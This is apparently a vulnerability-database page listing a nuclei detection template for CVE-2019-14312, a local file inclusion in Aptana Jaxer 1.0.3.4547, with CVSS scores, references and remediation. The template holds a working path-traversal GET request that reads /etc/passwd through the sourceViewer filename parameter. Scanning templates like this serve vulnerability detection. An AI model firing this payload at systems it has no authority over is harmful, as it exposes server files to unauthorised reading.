Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2019-14312
HistoryJul 28, 2021 - 2:04 a.m.

Aptana Jaxer 1.0.3.4547 - Local File inclusion

2021-07-2802:04:19
ProjectDiscovery
github.com
2
aptana
jaxer
local file inclusion
exploit-db
packetstorm
cve2019
vulnerability

CVSS2

4

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

SINGLE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:S/C:P/I:N/A:N

CVSS3

6.5

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

LOW

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

EPSS

0.023

Percentile

89.8%

Aptana Jaxer 1.0.3.4547 is vulnerable to local file inclusion in the wikilite source code viewer. An attacker can read internal files on the server via a tools/sourceViewer/index.html?filename=…/ URI.

id: CVE-2019-14312

info:
  name: Aptana Jaxer 1.0.3.4547 - Local File inclusion
  author: daffainfo
  severity: medium
  description: Aptana Jaxer 1.0.3.4547 is vulnerable to local file inclusion in the wikilite source code viewer. An attacker can read internal files on the server via a tools/sourceViewer/index.html?filename=../ URI.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, leading to unauthorized access and potential data leakage.
  remediation: |
    Upgrade to a patched version of Aptana Jaxer or apply the necessary security patches to mitigate the LFI vulnerability.
  reference:
    - https://www.exploit-db.com/exploits/47214
    - http://packetstormsecurity.com/files/153985/Aptana-Jaxer-1.0.3.4547-Local-File-Inclusion.html
    - https://github.com/aptana/Jaxer/commits/master
    - https://nvd.nist.gov/vuln/detail/CVE-2019-14312
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 6.5
    cve-id: CVE-2019-14312
    cwe-id: CWE-22
    epss-score: 0.02466
    epss-percentile: 0.90034
    cpe: cpe:2.3:a:aptana:jaxer:1.0.3.4547:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: aptana
    product: jaxer
  tags: cve2019,cve,lfi,edb,packetstorm,aptana

http:
  - method: GET
    path:
      - "{{BaseURL}}/tools/sourceViewer/index.html?filename=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 4a0a004730450220211914185787cdf387be2c26e25c18b7706cd88637ba4411c897d8017a5c249e02210095bbedfb97962c663e883378ed5a7661bd11e8f802bf0cb70c7ea56e86c5bd7f:922c64590222798bb761d5b6d8e72950

CVSS2

4

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

SINGLE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:S/C:P/I:N/A:N

CVSS3

6.5

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

LOW

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

EPSS

0.023

Percentile

89.8%